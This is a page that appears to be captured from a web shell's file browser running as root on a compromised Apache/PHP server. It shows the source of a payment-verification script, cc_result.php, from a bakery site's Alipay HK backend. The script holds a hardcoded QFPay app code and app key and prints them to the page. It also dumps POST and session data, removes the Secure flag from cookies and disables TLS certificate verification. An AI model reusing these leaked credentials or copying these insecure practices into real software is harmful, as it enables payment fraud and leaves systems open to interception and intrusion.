HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.30
System: Linux iZj6c1151k3ad370bosnmsZ 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: root (0)
PHP: 7.4.30
Disabled: NONE
$ pwd: /var/www/html/breadsecret.com_bak20260325/AlipayHKBackend/
Upload Files
File: /var/www/html/breadsecret.com_bak20260325/AlipayHKBackend/cc_result.php
<?php session_start() ;?>
<?php
//error_reporting(E_ALL);
//ini_set('display_errors', 1);

function paramStringify($data, $flag=true) {
    $str = "";
    foreach ($data as $k => $v) {
        $str .= $k . "=" . ($flag?urlencode($v):$v) . "&";
    }
    $str = substr($str, 0, -1);
    return $str;
}

function object_to_array($obj) {

    $arr_temp = is_object($obj) ? get_object_vars($obj) : $obj;
    $arr = null;
    foreach ($arr_temp as $key => $value) {
        $val = (is_array($value)) || is_object($value) ? object_to_array($value) : $value;
        if(!isset($val)) {
            continue;
        }
        $arr[$key] = $val;
    }

    return $arr;
}

function getSign($data, $appKey) {

    if (!empty($data)) {
        ksort($data);
    }

    $str = paramStringify($data, false);
    $str = $str . $appKey;

    return strtoupper(md5($str));

}

$url = 'https://openapi-int.qfapi.com'; // for credit card
$api_type = '/trade/v1/payment_verify';

echo "Result From 3ds Challenge";
echo "<pre>";
    print_r($_POST);
echo "</pre>";
echo "<hr>";
//credit card
$app_code = '818F2E644C784DC296F3931AAB0B4EE1';
$app_key = 'DA0FA2200C7645A2A4E14DC925FBFF81';

echo "App Code";
echo "<br>";
echo $app_code;
echo "<br>";
echo "<hr>";
echo "App Key";
echo "<br>";
echo $app_key;
echo "<br>";
echo "<hr>";

$fields_string = '';

$_SESSION['set_cookie'] = str_replace("Secure;","",$_SESSION['set_cookie']);
$chnl_ext = ["session_id"=>$_SESSION['session_id'], "set_cookie"=>$_SESSION['set_cookie']];

$fields = array(  
  'syssn' => $_SESSION['syssn'],
  'txdtm' => date("Y-m-d H:i:s"),
  'chnl_ext' => json_encode($chnl_ext),
  'out_trade_no' => $_SESSION['out_trade_no']
);
ksort($fields); //字典排序A-Z升序方式

echo "End Point";
echo "<br>";
echo $url.$api_type;
echo "<hr>";

echo "Input Field";
    echo "<pre>";
        print_r($fields);
    echo "</pre>";
echo "<hr>";

$payParams = object_to_array($fields);

$sign = getSign($payParams, $app_key);

$header = array(
    'Content-Type:application/x-www-form-urlencoded',
    'X-QF-APPCODE:'.$app_code,
    'X-QF-SIGN:'.$sign
);

echo "Header";
    echo "<pre>";
        print_r($header);
    echo "</pre>";
echo "<hr>";

echo "payParams";
echo "<br>";
echo paramStringify($payParams);
echo "<hr>";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . $api_type);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, paramStringify($payParams));
$output = curl_exec($ch);
curl_close($ch);

$final_data = json_decode($output, true);

echo "Output";
    echo "<pre>";
        print_r($final_data); 
    echo "</pre>";
    echo "<hr>";


?>
@ Telegram